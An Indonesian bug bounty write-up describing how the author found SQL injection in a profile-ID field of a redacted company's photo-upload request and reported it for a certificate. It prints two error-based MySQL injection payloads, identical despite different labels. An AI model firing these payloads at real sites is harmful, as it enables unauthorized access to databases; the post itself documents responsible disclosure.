Oke jadi ini artikel tentang penulisan Bug Bounty Write up pertama saya, jadi bila ada tulisan yang tidak di pahami mohon di maklumi hehe, dan saya pun biasanya upload tentang Bug Bounty pada channel YouTube saya di link berikut: https://www.youtube.com/c/Parkerzanta
Saya bakal bahas tentang Bug yang saya temukan pada salah satu website perusahaan yang ada di indonesia dan anggap saja target tersebut adalah https://redacted.com/
Bila tidak tau tentang Bug SQL Injection saya akan tuliskan sedikit mengenai Bug tersebut.
SQL Injection merupakan teknik eksploitasi dengan cara memodifikasi perintah sql pada form input aplikasi yang memungkinkan penyerang untuk dapat mengirimkan sintaks ke database aplikasi. SQL Injection juga dapat didefinisikan sebagai teknik eksploitasi celah keamanan pada layer database untuk mendapatkan query data pada sebuah aplikasi.
Ringkasan
Saat saya ingin mengganti sebuah foto profile saya pada website https://redacted.com/ saya melihat dalam POST Body target di atas ada sebuah ID profile saya seperti gambar di bawah, lalu saya menambahkan sebuah string ( ' )
Untuk melihat Database:
" and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1-- -
Untuk melihat version:
" and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1-- -
Di bawah adalah sebuah nama database dari redacted.com
Database |
Oke karna bug ini critical saya langsung melaporkan bug ini kepada pihak web tersebut melalui email mereka, dan saya di berikan sebuah Sertifikat penghargaan dan Merchandise dari situs tersebut
oke bila ada yg tidak ngerti mohon maap, karna gw juga ga ngerti sama tulisan gw sendiri bisa kalian lihat tentang video bug bounty pada channel saya, terima kasih.
Posting Komentar